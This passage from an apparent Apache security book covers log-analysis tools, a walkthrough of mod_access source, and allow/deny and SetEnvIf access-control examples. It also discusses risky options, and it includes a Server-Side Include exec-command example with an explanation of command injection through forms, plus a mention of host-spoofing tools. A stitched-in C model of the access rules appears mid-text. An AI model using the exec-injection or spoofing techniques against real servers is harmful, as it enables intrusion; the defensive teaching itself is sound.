Center. He explains that at the time, the Computing Center was expanding. As a
result, the logging process they were then using was no longer adequate. Therefore,
Ingham was looking for a way to automate scanning of logs. Watcher was the result
of his labors.

Watcher analyzes various logs and processes, looking for radically abnormal activity.
The author sufficiently fine-tuned this process so that Watcher can interpret the
widely variable output of commands, like ps, without setting off alarms. Watcher
runs on Unix systems and requires a C compiler.


NOCOL/NetConsole v4.0 


Location: ftp://ftp.navya.com/pub/vikas/nocol.tar.gz


NOCOL/NetConsole v4.0 is a suite of standalone applications that performs a wide 
variety of monitoring tasks. This suite offers a Curses interface, which is great for 
running on a wide range of terminals (it does not require The X Window System to 
work). It is extensible, has support for a Perl interface, and operates on networks 
running AppleTalk and Novell. 


PingLogger 
Author: Jeff Thompson 


Location: http://ryanspc.com/tools/pinglogger.tar.gz


PingLogger logs ICMP packets to an outfile. Using this utility, you can reliably deter- 
mine who is ping flooding you. The utility was originally written and tested on 
Linux (it requires a C compiler and IP header files), but may work on other Unix 
systems. 


LogSurfer 
Author: University of Hamburg, Department of Computer Science 


Location: ftp://ftp.cert.dfn.de/pub/tools/audit/logsurfer/logsurfer-1.41.tar.gz 


LogSurfer is a comprehensive log analysis tool. The program examines plain text log 
files, and based on what it finds and the rules you provide, it can perform various 
actions. These might include creating an alert, executing an external program, or 
even taking portions of the log data and feeding that to external commands or 
processes. LogSurfer requires C. 


Netlog 


Location: ftp://coast.cs.purdue.edu/pub/tools/unix/TAMU/ 


Developed at Texas A&M University, Netlog can log all TCP and UDP traffic. This 
tool also supports the logging of ICMP messages, although the developers report that 
performing this logging activity soaks up a great deal of storage. To use this product, 
you must have a C compiler. 
Analog
Author: Stephen Turner, University of Cambridge Statistical Laboratory
URL: http://www.statslab.cam.ac.uk/~sret1/analog/

Analog is a truly cross-platform log file analyzer. In addition to Linux, Analog
currently runs on the following operating systems:

• Macintosh

• OS/2

• Windows 95/NT

• Vax/VMS

• RiscOS

• BeOS

• BS2000/OSD


Analog also has built-in support for a wide variety of languages, including English, 
Portuguese, French, German, Swedish, Czech, Slovak, Slovene, Romanian, and 
Hungarian. 


And, as if that weren’t enough, Analog also does reverse DNS lookups (slowly), has a 
built-in scripting language (similar to the shell languages), and has at least minimal 
support for AppleScript. 


Finally, Analog supports most of the well-known Web server log formats, including 
Apache, NCSA, WebStar, IIS, W3 Extended, Netscape, and Netpresenz. For these 
reasons, Analog is a good tool to have around, especially in heterogeneous networks. 


Summary 


Apache has excellent logging facilities, and you can customize these to a significant 
degree. You must decide what, when, where, how, and to what degree Apache logs 
traffic. 


PART IV 


Runtime Apache 
Security 


IN THIS PART 


10 Apache Network Access Control 
11 Apache and Authentication: Who Goes There? 
12 Hacking Secure Code: Apache at Server Side 


13 Hacking Secure Code: Apache at Client Side 





10

Apache Network Access
Control

Web servers remain available 24/7, and anyone can
connect to your directories and peruse your content. To
forestall this, Apache's development team incorporated
various access controls. This chapter examines Apache's
network-based access control.


What Is Network Access Control? 


Network access control is the ability to incisively allow or deny users access to 
local network resources. When most folks think of network access control, they 
think in terms of firewalls, routers, switches, and packet filters that provide such 
controls. However, some applications can also provide additional access control 
layers. Luckily, Apache is one such application. 


You can instruct Apache to enforce various controls, including the following: 


• Exclusionary models based on IP address, domain, or hostname 
• Exclusionary models based on time or geographical origin 
• Inclusionary models based on IP address, domain, or hostname 
• Inclusionary models based on time or geographical origin 
• Conditional access based on the client 


Apache achieves this through mod_access, which you'll find in 
httpd-release/modules/aaa as mod_access.c. 


IN THIS CHAPTER 


• What Is Network Access Control? 
• How Apache Handles Network Access Control: Introducing mod_access 
• Using Network Access Control in Apache (httpd.conf) 
• Virtual Hosts and Network Access Control 


How Apache Handles Network Access Control: Introducing mod_access 


mod_access isn’t a gee-I-might-like-to-have-this module. Unless you specify otherwise 
by applying custom compilation options, Apache includes mod_access and compiles it 
in by default. 


mod_access.c is compact, efficient and, at least in Apache 2.0.28, consists of only 
346 lines before includes. In these 346 lines, mod_access establishes a network access 
control mechanism that approaches basic firewalling functionality. This is particularly 
useful, too, because on several platforms on which Apache runs, operating 
system-based network access control is nonexistent. 


A Brief mod_access Tour 

mod_access employs several functions, internal functions, and data type declarations 
and structures that, taken together, perform the relevant work in evaluating, granting, 
and denying access: 


• allowdeny_type 
• create_access_dir_config() 
• order() 
• allow_cmd() 
• in_domain() 
• find_allowdeny() 
• check_dir_access() 


allowdeny_type 

allowdeny_type is an enumerated data type. It sets the ground rules for the data 
types to be used in find_allowdeny() and the allowdeny structure therein, and 
eventually in a switch block that returns status depending on how it resolves 
allowdeny types: 


enum allowdeny_type { 
    T_ENV, 
    T_ALL, 
    T_IP, 
    T_HOST, 
    T_FAIL 
}; 
create_access_dir_config() 
create_access_dir_config() establishes and returns an access_dir_conf object: 


static void *create_access_dir_config(apr_pool_t *p, char *dummy) 
{ 
    int i; 
    access_dir_conf *conf = 
        (access_dir_conf *)apr_pcalloc(p, sizeof(access_dir_conf)); 

    /* every method starts out with the deny,allow ordering */ 
    for (i = 0; i < METHODS; ++i) { 
        conf->order[i] = DENY_THEN_ALLOW; 
    } 
    conf->allows = apr_array_make(p, 1, sizeof(allowdeny)); 
    conf->denys = apr_array_make(p, 1, sizeof(allowdeny)); 

    return (void *)conf; 
} 

order() 

order() establishes an array to anchor different values, depending on the rules you 
establish. It does this via strcasecmp(), a <string.h> routine that performs non-case 
sensitive string comparisons: 


static const char *order(cmd_parms *cmd, void *dv, const char *arg) 
{ 
    access_dir_conf *d = (access_dir_conf *) dv; 
    int i, o; 

    if (!strcasecmp(arg, "allow,deny")) 
        o = ALLOW_THEN_DENY; 
    else if (!strcasecmp(arg, "deny,allow")) 
        o = DENY_THEN_ALLOW; 
    else if (!strcasecmp(arg, "mutual-failure")) 
        o = MUTUAL_FAILURE; 
    else 
        return "unknown order"; 

    /* apply the ordering to every method the enclosing <Limit> covers */ 
    for (i = 0; i < METHODS; ++i) 
        if (cmd->limited & (AP_METHOD_BIT << i)) 
            d->order[i] = o; 

    return NULL; 
} 
NOTE 
Although string case sensitivity is generally not an issue, rare configurations on some operating 
systems can affect your access controls, as we'll discuss in Chapter 11, “Apache and 
Authentication: Who Goes There?” 


allow_cmd() 

order() determines what order you've specified, but the order is only the leading 
rule you apply, and merely tells mod_access and Apache in what order to evaluate 
your controls. allow_cmd() checks to ensure that you didn’t mangle the trailing 
criterion. 


static const char *allow_cmd(cmd_parms *cmd, void *dv, const char *from, 
                             const char *where_c) 
{ 
    access_dir_conf *d = (access_dir_conf *) dv; 
    allowdeny *a; 
    char *where = apr_pstrdup(cmd->pool, where_c); 
    char *s; 
    char msgbuf[120]; 
    apr_status_t rv; 

    if (strcasecmp(from, "from")) 
        return "allow and deny must be followed by 'from'"; 

    /* cmd->info distinguishes the allow directive from deny */ 
    a = (allowdeny *) apr_array_push(cmd->info ? d->allows : d->denys); 
    a->x.from = where; 
    a->limited = cmd->limited; 

    if (!strncasecmp(where, "env=", 4)) { 
        a->type = T_ENV; 
        a->x.from += 4; 
    } 
    else if (!strcasecmp(where, "all")) { 
        a->type = T_ALL; 
    } 
    else if ((s = strchr(where, '/'))) { 
        /* address/mask or address/bits form */ 
        *s++ = '\0'; 
        rv = apr_ipsubnet_create(&a->x.ip, where, s, cmd->pool); 
        if (APR_STATUS_IS_EINVAL(rv)) { 
            /* looked nothing like an IP address */ 
            return "An IP address was expected"; 
        } 
        else if (rv != APR_SUCCESS) { 
            apr_strerror(rv, msgbuf, sizeof msgbuf); 
            return apr_pstrdup(cmd->pool, msgbuf); 
        } 
        a->type = T_IP; 
    } 
    else if (!APR_STATUS_IS_EINVAL(rv = apr_ipsubnet_create(&a->x.ip, where, 
                                                            NULL, cmd->pool))) { 
        /* full or partial IP address without a mask */ 
        if (rv != APR_SUCCESS) { 
            apr_strerror(rv, msgbuf, sizeof msgbuf); 
            return apr_pstrdup(cmd->pool, msgbuf); 
        } 
        a->type = T_IP; 
    } 
    else { /* no slash, didn't look like an IP address => must be a host */ 
        a->type = T_HOST; 
    } 

    return NULL; 
} 


NOTE 


allow_cmd() essentially checks for typographical errors in your rules. For example, if you start 
a rule with allow, you must follow it with a directional (from) and some value (typically, an 
address or address mask). 





in_domain() 
in_domain() makes further checks, ensuring that if you specified a domain name, it 
matched the entire string (or at least, a fully articulated portion thereof): 


static int in_domain(const char *domain, const char *what) 
{ 
    int dl = strlen(domain); 
    int wl = strlen(what); 

    if ((wl - dl) >= 0) { 
        if (strcasecmp(domain, &what[wl - dl]) != 0) 
            return 0; 

        /* Make sure we matched an *entire* subdomain --- if the user 
         * said 'allow from good.com', we don't want people from nogood.com 
         * to be able to get in. 
         */ 
        if (wl == dl) 
            return 1;            /* matched whole thing */ 
        else 
            return (domain[0] == '.' || what[wl - dl - 1] == '.'); 
    } 
    else 
        return 0; 
} 


find_allowdeny() 

find_allowdeny() walks an array checking various allow/deny objects and sends 
these through a switch block, checking member type properties (that is, is this an IP 
address, a host, ALL, none, or an environment variable?): 


static int find_allowdeny(request_rec *r, apr_array_header_t *a, int method) 
{ 
    allowdeny *ap = (allowdeny *) a->elts; 
    apr_int64_t mmask = (AP_METHOD_BIT << method); 
    int i; 
    int gothost = 0; 
    const char *remotehost = NULL; 

    for (i = 0; i < a->nelts; ++i) { 
        /* skip rules that do not apply to this request method */ 
        if (!(mmask & ap[i].limited)) 
            continue; 

        switch (ap[i].type) { 
        case T_ENV: 
            if (apr_table_get(r->subprocess_env, ap[i].x.from)) { 
                return 1; 
            } 
            break; 

        case T_ALL: 
            return 1; 

        case T_IP: 
            if (apr_ipsubnet_test(ap[i].x.ip, r->connection->remote_addr)) { 
                return 1; 
            } 
            break; 

        case T_HOST: 
            /* resolve the client once, with a double-reverse lookup */ 
            if (!gothost) { 
                int remotehost_is_ip; 

                remotehost = ap_get_remote_host(r->connection, r->per_dir_config, 
                                                REMOTE_DOUBLE_REV, &remotehost_is_ip); 

                if ((remotehost == NULL) || remotehost_is_ip) 
                    gothost = 1;    /* no usable name: host rules cannot match */ 
                else 
                    gothost = 2; 
            } 

            if ((gothost == 2) && in_domain(ap[i].x.from, remotehost)) 
                return 1; 
            break; 

        case T_FAIL: 
            /* do nothing? */ 
            break; 
        } 
    } 

    return 0; 
} 


check_dir_access 

mod_access’s big enchilada is check_dir_access(). When Apache calls mod_access, 
check_dir_access() begins the evaluation process. First, it gets the module’s 
per-directory configuration information: 


static int check_dir_access(request_rec *r) 
{ 
    int method = r->method_number; 
    int ret = OK; 
    access_dir_conf *a = (access_dir_conf *) 
        ap_get_module_config(r->per_dir_config, &access_module); 
Next, it determines the order scheme you specified on how to test access privileges. 
We'll later examine those schemes in detail, but for now, they are 


• allow,deny 
• deny,allow 
• mutual-failure 


check_dir_access tries all three in succession: 


    if (a->order[method] == ALLOW_THEN_DENY) { 
        ret = HTTP_FORBIDDEN;                 /* default: denied */ 
        if (find_allowdeny(r, a->allows, method)) 
            ret = OK; 
        if (find_allowdeny(r, a->denys, method)) 
            ret = HTTP_FORBIDDEN;             /* a deny match has the last word */ 
    } 
    else if (a->order[method] == DENY_THEN_ALLOW) { 
        if (find_allowdeny(r, a->denys, method)) 
            ret = HTTP_FORBIDDEN; 
        if (find_allowdeny(r, a->allows, method)) 
            ret = OK;                         /* an allow match has the last word */ 
    } 
    else { 
        if (find_allowdeny(r, a->allows, method) 
            && !find_allowdeny(r, a->denys, method)) 
            ret = OK; 
        else 
            ret = HTTP_FORBIDDEN; 
    } 

Finally, it checks for Satisfy declarations, which apply in situations where you 
restrict access both by network and username/password: 


    if (ret == HTTP_FORBIDDEN 
        && (ap_satisfies(r) != SATISFY_ANY || !ap_some_auth_required(r))) { 
        ap_log_rerror(APLOG_MARK, APLOG_NOERRNO|APLOG_ERR, 0, r, 
                      "client denied by server configuration: %s", 
                      r->filename); 
    } 

    return ret; 
} 
NOTE 


We'll discuss username/password authentication in Chapter 11. 


Historically, Apache separated the access control file (access.conf) from the main 
httpd configuration file (httpd.conf). That is no longer true, as evidenced by the 
default access.conf’s contents: 


## access.conf -- Apache HTTP server configuration file 
# 
# This is the default file for the 
# AccessConfig directive in httpd.conf. 
# It is processed after httpd.conf and srm.conf. 
# 
# To avoid confusion, it is recommended that you 
# put all of your Apache server directives into 
# the httpd.conf file and leave this 
# one essentially empty. 
# 
################################################## 


Depending on your Apache distribution (or if you changed the defaults), your 
httpd.conf file could theoretically live anywhere. In version 1.3, it was in 
/etc/http/conf/httpd.conf. In version 2.0, Apache ships with httpd.conf alone, 
and access.conf and srm.conf no longer exist. 


Here’s a typical <Directory> block for DocumentRoot; in this case, it’s located in 
/home/httpd/html: 


<Directory "/home/httpd/html"> 
# 
# This may also be "None", "All", or 
# any combination of "Indexes", 
# "Includes", "FollowSymLinks", "ExecCGI", 
# or "MultiViews". 
# 
# Note that "MultiViews" must be named 
# *explicitly* --- "Options All" 
# doesn't give it to you. 
# 
################################################## 
    Options None 
# 
    AllowOverride All 
# 
# Controls who can get stuff from this server. 
# 
    Order deny,allow 
    Allow from all 
#   Deny from all 
</Directory> 


The directives offer three avenues of control: 


• allow—The allow directive controls which hosts (if any) can connect, and 
offers you three choices: all, none, or list, where list is a list of approved 
hosts. 

• deny—The deny directive controls which hosts (if any) cannot connect, and 
offers you three choices: all, none, or list (again, list is a list of unapproved 
hosts). 

• order—The order directive controls the order in which the allow/deny rules 
are applied and offers three choices: allow,deny; deny,allow; or mutual-failure. 
(mutual-failure is a special option that specifies that a connection must pass 
both allow and deny rules.) 


Using these directives in concert, you can apply access control in several ways: 

• Inclusively—You explicitly name all authorized hosts 
• Exclusively—You explicitly name all unauthorized hosts 
• Inclusively and exclusively—You mix and match 

Let’s look at a few examples. 


Inclusive Screening: Explicitly Allowing Authorized Hosts 


Suppose your host is linux1.mydom.net, and you want to restrict all outside traffic. 
Your access control section might look like this: 


order deny,allow 
allow from linux1.mycom.net 
deny from all 


Here, on evaluation of a connect request, the server first processes denials and rejects 
everyone. Next, it checks for approved hosts and finds linux1.mycom.net. In this 
scenario, only connection requests from linux1.mycom.net are allowed. 
Of course, the preceding scenario is a bit too restrictive. Chances are, you'd like to 
allow at least a few machines in your domain to connect. If so, you could make rules 
slightly more liberal, using a host list, like this: 


order deny,allow 
allow from linux1.mydom.net linux2.mydom.net linux3.mydom.net 
deny from all 


In this new scenario, not only can linux1.mycom.net connect, but linux2.mycom.net 
and linux3.mycom.net can, too. However, other machines in your domain are left 
out in the cold. (For example, the server will reject connections from 
fiji.mycom.net and hawaii.mycom.net.) 


Or, perhaps you aim to allow all connections initiated from your domain (and reject 
only those coming from foreign networks). To do so, you could configure the access 
control directives like this: 


order deny,allow 
allow from mydom.net 
deny from all 


Here, any machine in the mydom.net domain can connect. When possible though, 
use IP addresses (not hostnames) to designate hosts and networks. This method is a 
tad more stringent and guards against mistakes. 


Here’s an example that limits connections to those initiated by the host 
www.pacificnet.net: 


order deny,allow 
allow from 207.171.0.253 
deny from all 


And here’s a more general rule set that limits connections to those initiated from 
Pacificnet’s network, through their lead router coming out of Qwest: 


order deny,allow 
allow from 65.112.160.42 
deny from all 


But these are inclusive schemes, where you explicitly name all hosts or networks that 
can connect. You need not rely on inclusive schemes alone. You can also use exclu- 
sive schemes to screen out just one or a few hosts using the deny directive. 
Exclusive Screening: Explicitly Blocking Unwanted Hosts 


Suppose you wanted to block connections from hackers.annoying.net, but still 
allow connections from everyone else. You might set up your directives like this: 


order deny,allow 
allow from all 
deny from hackers.annoying.net 


This would block hackers.annoying.net only and grant other hosts open access. Of 
course, this would probably be an unrealistic approach in practice. The folks on 
hackers likely also have accounts on other machines within annoying.net. 
Therefore, you might be forced to block the entire domain, like this: 


order deny,allow 
allow from all 
deny from annoying.net 


This would block any host coming from annoying.net. And, if you later encountered 
problems from users on hackers from still other domains, you could simply add the 
new “bad” domains to the list, like this: 


order allow,deny 
allow from all 
deny from annoying.net hackers.really-annoying.net hackers.knuckleheads.net 


But things aren’t always that cut and dried. Sometimes, you need to limit access to a 
single domain and even refuse connections from machines within it. For this, you 
must use the mutual-failure option. 


The mutual-failure Option: Mix and Match 


Suppose that you’re running Apache in an intranet environment where your main 
network is ourcompany.net. Your aim is to provide Web access to all hosts except 
accounts.ourcompany.net and shipping.ourcompany.net. The easiest way is to 
establish a rule set like this: 


order mutual-failure 
allow from ourcompany.net 
deny from accounts.ourcompany.net shipping.ourcompany.net 


The mutual-failure directive forces tests wherein incoming hosts must meet both 
allow and deny rules. Here, all hosts in ourcompany.net except accounts and ship- 
ping are granted access. 
In summation, the allow and deny directives offer you several ways to allow or deny 
access by address: 


• Full IP addresses (165.193.123.117) 
• Network CIDR designations (10.1.0.0/16) 
• Network-netmask pairs (10.1.0.0/255.255.0.0) 
• Partial domain names (samspublishing.com) 
• Partial IP addresses (165.193.123 or 165.193) 


For example, consider this code: 


Deny from 64.133 


This will deny all hosts carrying IP addresses of 64.133.x.x. Or this: 

Deny from 64.133.78 

This will block all hosts with IP addresses of 64.133.78. Or, to block a single 
machine: 


Deny from 64.133.78.10 


This will block the host with IP address 64.133.78.10. 
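To see how the check_dir_access() branches shown earlier turn the rule sets in this section (inclusive, exclusive, mutual-failure, partial IP) into a verdict, here is an added C model of that evaluation; it is not mod_access's code or the book's, and the names parse_rule, check_access and evaluate are my own. It keeps the in_domain() label-boundary test and the syntax checks of order() and allow_cmd(), and leaves out the env= and CIDR forms.

```c
/* Added example, not code from mod_access or the book: a compact model of the access
 * evaluation described in this chapter (Order allow,deny / deny,allow / mutual-failure
 * over "from" values of all, hostname suffixes and dotted IP prefixes; env= and CIDR
 * forms are left out), for trying the chapter's rule sets against constructed clients. */
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define MAX_RULES 8
#define MAX_LEN   64
enum order { ALLOW_THEN_DENY, DENY_THEN_ALLOW, MUTUAL_FAILURE };

struct rules {
    enum order order;
    char allows[MAX_RULES][MAX_LEN], denys[MAX_RULES][MAX_LEN];
    int nallows, ndenys;
};

/* Same test as mod_access's in_domain(): "what" must end in "domain" and the match
 * must begin on a label boundary, so "good.com" never matches "nogood.com". */
int in_domain(const char *domain, const char *what)
{
    size_t dl = strlen(domain), wl = strlen(what);
    if (wl < dl || strcasecmp(domain, what + (wl - dl)) != 0)
        return 0;
    return wl == dl || domain[0] == '.' || what[wl - dl - 1] == '.';
}

/* Partial IP rule: "64.133" covers 64.133.x.x; only whole leading octets count. */
int ip_prefix_match(const char *prefix, const char *ip)
{
    size_t pl = strlen(prefix);
    return strncmp(prefix, ip, pl) == 0 && (ip[pl] == '\0' || ip[pl] == '.');
}

/* Does any entry of a list match the client?  Mirrors find_allowdeny().  host is
 * NULL when the reverse lookup failed; hostname rules then never match. */
static int find_allowdeny(const char (*list)[MAX_LEN], int n, const char *ip, const char *host)
{
    for (int i = 0; i < n; i++) {
        int is_ip = strspn(list[i], "0123456789.") == strlen(list[i]);
        if (strcasecmp(list[i], "all") == 0)
            return 1;
        if (is_ip ? ip_prefix_match(list[i], ip) : (host != NULL && in_domain(list[i], host)))
            return 1;
    }
    return 0;
}

/* Parse one Order / Allow from / Deny from line with the syntax checks that
 * order() and allow_cmd() make.  Returns 1 on success, 0 on a rejected line. */
int parse_rule(struct rules *r, const char *line)
{
    static const char *orders[] = { "allow,deny", "deny,allow", "mutual-failure" };
    char buf[256];
    snprintf(buf, sizeof buf, "%s", line);
    char *tok = strtok(buf, " \t");
    if (tok == NULL) return 0;
    if (strcasecmp(tok, "Order") == 0) {
        char *arg = strtok(NULL, " \t");
        for (int o = 0; arg != NULL && o < 3; o++)
            if (strcasecmp(arg, orders[o]) == 0) { r->order = (enum order)o; return 1; }
        return 0;                                   /* "unknown order" */
    }
    int is_allow = strcasecmp(tok, "Allow") == 0;
    if (!is_allow && strcasecmp(tok, "Deny") != 0)
        return 0;
    tok = strtok(NULL, " \t");
    if (tok == NULL || strcasecmp(tok, "from") != 0)
        return 0;                  /* allow and deny must be followed by 'from' */
    int *n = is_allow ? &r->nallows : &r->ndenys;
    while ((tok = strtok(NULL, " \t")) != NULL) {
        if (*n >= MAX_RULES) return 0;
        snprintf(is_allow ? r->allows[*n] : r->denys[*n], MAX_LEN, "%s", tok);
        (*n)++;
    }
    return 1;
}

/* 1 = OK, 0 = HTTP_FORBIDDEN, following the three branches of check_dir_access(). */
int check_access(const struct rules *r, const char *ip, const char *host)
{
    int allowed = find_allowdeny(r->allows, r->nallows, ip, host);
    int denied = find_allowdeny(r->denys, r->ndenys, ip, host);
    if (r->order == DENY_THEN_ALLOW)
        return allowed || !denied;  /* starts OK; the allow list has the last word */
    return allowed && !denied;      /* allow,deny and mutual-failure: deny has the last word */
}

/* Build a rule set from config lines and evaluate one client.
 * Returns 1 (OK), 0 (HTTP_FORBIDDEN) or -1 when a line is rejected. */
int evaluate(const char *const *lines, int nlines, const char *ip, const char *host)
{
    struct rules r = {0};                          /* empty lists, allow,deny order */
    for (int i = 0; i < nlines; i++)
        if (!parse_rule(&r, lines[i]))
            return -1;
    return check_access(&r, ip, host);
}
```

One thing the model makes visible: under Order deny,allow the allow list is evaluated last, so "Allow from all" followed by "Deny from annoying.net" still admits annoying.net; that combination only blocks under Order allow,deny, as in the three-domain example above.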


NOTE 


Note that while IP and hostname-based screening defeat average attackers, spoofing utilities 
can defeat such access control mechanisms. These utilities (like Mendax) enable an attacker to 
present his machine as another and thus gain authorization. For more information, see this 
page: http://www.linuxgazette.com/issue63/sharma.html 





However, they also provide one additional method, a method that invites endless 
possibilities: the power to allow or deny based on environment variables. 


Access Control Based on Environment Variables 

When used with another directive, SetEnvIf, allow and deny let you selectively 
grant or refuse access to remote clients based not merely on their browser, but on other 
environment variables and header fields. 


Table 10.1 lists the environment variables and request header fields that allow, deny, and 
SetEnvIf deal with. 
TABLE 10.1 Variables and Request Headers SetEnvIf Supports 


Variable or Header      Value 
----------------------  ----------------------------------------------- 
Accept                  (Request Header) 
Accept-Charset          (Request Header) 
Accept-Encoding         (Request Header) 
Accept-Language         (Request Header) 
Authorization           (Request Header) 
Expect                  (Request Header) 
From                    (Request Header) 
Host                    (Request Header) 
HTTP_ACCEPT             Stores the types the client will accept 
HTTP_COOKIE             Stores the cookie sent by the remote client 
HTTP_FORWARDED          Stores a proxy connection’s origin 
HTTP_REFERER            Stores the referring document's URL 
HTTP_USER_AGENT         Stores the client software identification 
If-Match                (Request Header) 
If-Modified-Since       (Request Header) 
If-None-Match           (Request Header) 
If-Range                (Request Header) 
If-Unmodified-Since     (Request Header) 
Max-Forward             (Request Header) 
Proxy-Authorization     (Request Header) 
QUERY_STRING            Stores the client’s raw query string 
Range                   (Request Header) 
Referer                 (Request Header) 
REMOTE_ADDR             Stores the client’s IP address 
REMOTE_HOST             Stores the client’s host name 
REMOTE_IDENT            Stores the remote user name (if available) 
REMOTE_USER             Stores the user name for authentication 
REQUEST_FILENAME        Stores the requested resource’s local path 
REQUEST_METHOD          Stores the client's HTTP request method 
REQUEST_PROTOCOL        Stores the client’s request protocol 
REQUEST_URI             Stores the HTTP requested URI 
SCRIPT_FILENAME         Stores the requested resource’s local path 
TE                      (Request Header) 
THE_REQUEST             Stores the client's full HTTP request line 
TIME                    Stores the time in a formatted string 
TIME_DAY                Stores the current date 
TIME_HOUR               Stores the current hour (0-23) 
TIME_MIN                Stores the current minute (0-59) 
TIME_MON                Stores the current month (0-11) 
TIME_SEC                Stores the current second (0-59) 
TIME_WDAY               Stores the current weekday (0-6) 
TIME_YEAR               Stores the current year (XXXX) 
User-Agent              (Request Header) 


Blocking Access Based on Hour, Day, or Month 
To restrict access by time, you must use allow, deny, and SetEnvIf in concert, like 
this: 


SetEnvIf TIME_HOUR 12 punctual 
<Directory /docs> 
    Order Deny,Allow 
    Deny from all 
    Allow from env=punctual 
</Directory> 


The preceding code sets a series of conditions and triggers access based on them as 
follows: 


• Check the time to ensure that it’s noon (SetEnvIf TIME_HOUR 12) 
• If it is noon, derive an environment variable punctual 
• Nest and use that variable in an allow assignment 


Similarly, for days, (to restrict access to Monday, for example), you could do this: 


SetEnvIf TIME_WDAY 1 punctual 
<Directory /docs> 
    Order Deny,Allow 
    Deny from all 
    Allow from env=punctual 
</Directory> 


Or perhaps you’d like to restrict access by month. Try this to allow access only 
in May: 


SetEnvIf TIME_MON 4 punctual 
<Directory /docs> 
    Order Deny,Allow 
    Deny from all 
    Allow from env=punctual 
</Directory> 
Filtering Access by Browser Client 
Perhaps you'd like to control access by browser. To do so, try keying access from the 
User-Agent header, like this: 


SetEnvIf User-Agent *Opera.* agentok 
<Directory /docs> 
    Order Deny,Allow 
    Deny from all 
    Allow from env=agentok 
</Directory> 


Here, only users surfing with the Opera Web client can gain access. I chose Opera to 
illustrate an important point, by the way. Opera has a mechanism that lets users set 
how and what their browser supports in request headers. They can masquerade as 
coming from various browsers (MSIE and Netscape don’t offer this function). 


Configuration Options That Can Affect Security 


Except for network access control functions in httpd.conf, Apache installs with 
optimal security settings. In fact, these settings are stringent enough that you might 
have to change some of them. 


As you tailor your Apache configuration to suit your needs (and learn more about it), 
you might be tempted to enable many useful options that are disabled by default. 
Table 10.2 lists these options and what they do. 


TABLE 10.2 Various Options in httpd.conf 


Option            Purpose 
----------------  ---------------------------------------------------------------- 
ExecCGI           ExecCGI specifies that CGI scripts can be executed under this 
                  directory hierarchy. 
FollowSymLinks    FollowSymLinks allows remote users to follow symbolic links simply 
                  by clicking on their hyperlinks. 
Includes          Includes specifies that Apache will process Server-Side Includes. 
Indexes           Indexes enables directory listing, where Apache will display a 
                  file list if no default page is found. 





These options and how you configure them can raise security issues. Let’s briefly 
cover those now. 


The ExecCGI Option: Enabling CGI Program Execution 


Not long after the Web first emerged, it became apparent that though hypertext 
allowed users to navigate documents (or between them), it provided little interactivity. 
Users couldn’t manipulate data or search through it. 
In response, developers created various programs that could interact with Web 
servers to produce rudimentary indexing. As the demand for this functionality 
increased, so did the need for a standard by which such programs (called gateway 
programs) could be written. The result was the Common Gateway Interface. 


The Common Gateway Interface (CGI) is a standard that specifies how Web servers 
use external applications to pass dynamic information to Web clients. CGI is 
platform- and language-neutral, so as long as you have the necessary compiler or 
interpreter, you can write gateway programs in any language, including but not limited to 


• BASIC 
• C/C++ 
• Perl 
• Python 
• REXX 
• Tcl 
• The shell languages (sh, csh, bash, ksh, ash, zsh, and so on) 


Typical CGI tasks include performing database lookups, displaying statistics, and 
running WHOIS or FINGER queries through a Web interface. (Technically, you could 
perform almost any network-based query using CGI.) 


Apache allows you to control whether CGI programs can be executed and who can 
execute them. To add CGI execution permission, enable the ExecCGI option, in 
httpd.conf, like this: 


Options ExecCGI 


Does enabling CGI execution pose any risk? Yes, because even though you might 
observe safe programming practices, your users might not. They could inadvertently 
write CGI programs that weaken system security. Hence, enabling CGI execution is 
sometimes more trouble than it’s worth. (Frankly, you might find yourself reviewing 
your users’ code, looking for possible holes.) If you can avoid granting CGI execution, 
do it. 


The FollowSymLinks Option: Allowing Users to Follow Symbolic Links 

Various operating systems support symbolic links. Symbolic links are small files that 
point to the location of other files. When accessed, a symbolic link behaves as 
though you accessed the real referenced file. 
For example, suppose your home directory is /home/hacker and you frequently 
access a file named /home/jack/accounting/reports/1999/returns.txt. Instead of 
typing that long path each time you need access, you could create a symbolic link, 
like this: 


ln -s /home/jack/accounting/reports/1999/returns.txt returns.txt 


This would place a symbolic link in your home directory named reports.txt. From 
now on, you can access reports.txt locally. This is convenient. 


Apache supports an option (FollowSymLinks) that allows remote users to follow 
symbolic links in the current directory simply by clicking on their hyperlinks. This 
has serious security implications, because local users can inadvertently (or even 
maliciously) link to internal system files and thus “break the barrier,” allowing remote 
users to jump over the virtual barrier that separates the Web space from the main file 
system hierarchy. Do not enable the FollowSymLinks option. 


CAUTION 


Another reason not to enable FollowSymLinks is that you must constantly check that files 
you've linked to have sufficiently restrictive permissions. If you have more than a handful of 
users, this could eat substantial time and effort and prove to be a real hassle. 





The Includes Option: Enabling Server-Side Includes 


Apache supports Server-Side Includes (SSI), a system that allows Webmasters to 
include on-the-fly information in HTML documents without actually writing CGI 
programs. 


SSI does this using HTML-based directives. These are commands that you embed in 
HTML documents. When Web clients request such documents, the server parses and 
executes those commands. 


Here’s an example that uses the config timefmt directive to set the date format and 
the echo directive to report the time and date: 


<html> 
The current date and time is: 
<!--#config timefmt="%B %e %Y" --><!--#echo var="DATE_LOCAL" --> 
</html> 


When a Web browser calls this document, the server will capture the local host’s 
date and time and output the following: 


The current date and time is: Monday, 14-Jun-99 11:47:37 PST 
This is convenient, and much easier than writing an external program to do the 
same. Similarly, SSI allows you to cleanly include additional HTML documents into 
the final output, like this: 


<!--#include file="news.html" --> 


The preceding code, inserted into a table, will cause Apache to retrieve news.html’s 
contents and insert these into the table. 


Because SSIs are so convenient, you might be persuaded to enable them. I advise 
caution here, because they can pose security risks. The exec cmd SSI directive, for 
example, lets you specify system commands within your source, like this: 


<!--#exec cmd="ls -l /" -->   (This would output a directory listing) 


This could open up your server to possible attack. For instance, suppose your Web 
page also has a form that takes user input. An attacker could download the HTML 
source code, insert malicious exec commands, and then submit the form. Your server 
would process the form and unwittingly execute the commands assigned to exec. 


For this reason, if you do intend to allow SSIs, at least restrict them to file inclusion 
and display functions only. 


Enabling Server-Side Includes Without Command Execution 
By default, httpd.conf denies all options, including Server-Side Includes: 


# Options Indexes FollowSymLinks 
Options None 


To enable basic Server-Side Includes without enabling the exec directive, change 
your Options line to this: 


Options IncludesNOEXEC 


The Indexes Option: Enabling Directory Indexing 


One option you should ponder before enabling it is directory indexing. Directory 
indexing is where Apache sends a directory listing if no default page is found. In a 
moment, I’ll demonstrate why this is undesirable; but first, let’s examine how 
directory indexing works. 


It’s an unfortunate fact of life that you cannot control how others construct 
hyperlinks that point to your server pages. In a perfect world, all Webmasters would 
